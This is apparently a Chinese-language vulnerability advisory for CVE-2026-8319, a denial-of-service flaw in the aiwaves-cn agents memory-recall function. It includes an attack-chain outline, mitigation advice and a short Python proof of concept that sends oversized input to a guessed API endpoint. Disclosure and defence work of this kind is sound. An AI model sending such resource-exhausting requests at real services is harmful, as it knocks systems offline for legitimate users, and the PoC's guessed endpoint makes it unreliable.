IPBUF安全漏洞报告
English
CVE-2026-8319 CVSS 5.3 中危

CVE-2026-8319 aiwaves-cn agents资源消耗漏洞

披露日期: 2026-05-11
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-8319
漏洞类型
资源耗尽
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
aiwaves-cn agents

相关标签

资源消耗DoSaiwaves-cnagentsCVE-2026-8319

漏洞概述

aiwaves-cn agents项目中的cheshire_cat_core组件存在安全漏洞。该漏洞位于`core/cat/looking_glass/stray_cat.py`文件的`recall_relevant_memories_to_working_memory`函数中。攻击者无需认证即可远程利用该漏洞,通过特定请求触发资源消耗,导致服务拒绝。目前利用代码已公开,厂商尚未修复。

技术细节

该漏洞源于`cheshire_cat_core`组件在处理记忆检索时的逻辑缺陷。具体而言,`stray_cat.py`中的`recall_relevant_memories_to_working_memory`函数未能对输入参数进行有效的限制或校验。攻击者可以通过构造特殊的网络请求,触发该函数进行过度的计算或内存分配操作。由于CVSS向量显示无需用户交互且无需认证,攻击者可远程发送恶意数据包,导致服务器CPU或内存资源被持续占用,最终造成服务不可用。这种类型的漏洞属于逻辑型DoS,能有效中断服务。

攻击链分析

STEP 1
侦察
攻击者识别出目标运行的是aiwaves-cn agents服务,并确定其API接口可访问。
STEP 2
武器化
攻击者构造针对`recall_relevant_memories_to_working_memory`函数的恶意HTTP请求,该请求包含导致资源耗尽的特定参数。
STEP 3
交付
攻击者通过网络向目标服务器发送精心构造的恶意请求包。
STEP 4
利用
服务器处理该请求,调用受漏洞影响的函数。由于缺乏限制,函数开始消耗大量系统资源(CPU/内存)。
STEP 5
影响
服务器资源被耗尽,导致合法用户无法访问服务(拒绝服务),系统可用性受损。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Proof of Concept for CVE-2026-8319 # This script sends a malicious payload to trigger resource consumption def exploit(target_url): # The vulnerable endpoint might be part of the API handling memory recall endpoint = f"{target_url}/api/retrieve_memory" # Malicious payload designed to stress the recall_relevant_memories_to_working_memory function # Adjust parameters based on actual API behavior (e.g., large text or high k value) payload = { "text": "A" * 100000, # Excessive input length "k": 99999 # Requesting a large number of memories } try: print(f"Sending exploit payload to {endpoint}...") response = requests.post(endpoint, json=payload, timeout=10) print(f"Response status code: {response.status_code}") print("If server hangs or crashes, the exploit was successful.") except requests.exceptions.Timeout: print("Request timed out. Server resources likely exhausted.") except Exception as e: print(f"An error occurred: {e}") if __name__ == "__main__": # Replace with the actual target address target = "http://127.0.0.1:8000" exploit(target)

影响范围

aiwaves-cn agents <= commit e8c4e3c2d19739d3dff59e577d1c97090cc15f59

防御指南

临时缓解措施
建议在官方修复前,通过网络访问控制列表(ACL)限制对受影响组件的访问权限,或部署Web应用防火墙(WAF)规则以拦截包含异常参数的请求,减轻资源耗尽攻击的风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。